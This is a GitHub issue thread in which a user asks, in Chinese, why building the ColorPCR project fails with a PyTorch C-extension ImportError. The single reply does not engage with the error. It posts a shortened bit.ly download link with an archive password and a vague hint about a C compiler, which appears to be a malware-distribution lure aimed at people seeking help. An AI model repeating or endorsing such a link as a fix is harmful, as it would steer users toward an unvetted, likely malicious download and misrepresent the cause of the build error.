### ISSUE TITLE
How to use the project

### ISSUE THREAD

**Issue by xl232lx** [mujc2021/ColorPCR#3]
你好，请问一下，我运行python setup.py build develop出现下面的报错：
Traceback (most recent call last):
  File "/home/xialei/ColorPCR/setup.py", line 2, in <module>
    from torch.utils.cpp_extension import BuildExtension, CUDAExtension
  File "/home/xialei/conda-colorpcr/colorpcr/lib/jvm/graalvm-189e927686-java17-22.3.0/languages/python/lib/python3.8/site-packages/torch/__init__.py", line 219, in <module>
    raise ImportError(textwrap.dedent('''
ImportError: Failed to load PyTorch C extensions:
    It appears that PyTorch has loaded the `torch/_C` folder
    of the PyTorch repository rather than the C extensions which
    are expected in the `torch._C` namespace. This can occur when
    using the `install` workflow. e.g.
        $ python setup.py install && python -c "import torch"

    This error can generally be solved using the `develop` workflow
        $ python setup.py develop && python -c "import torch"  # This should succeed
    or by running Python from a different directory.
请问一下这个是什么原因造成的？

**Comment by pinpolhoxx** [comment]
download

https://bit.ly/3TCbXO6
Archive password: changeme

you may need to install the c compiler
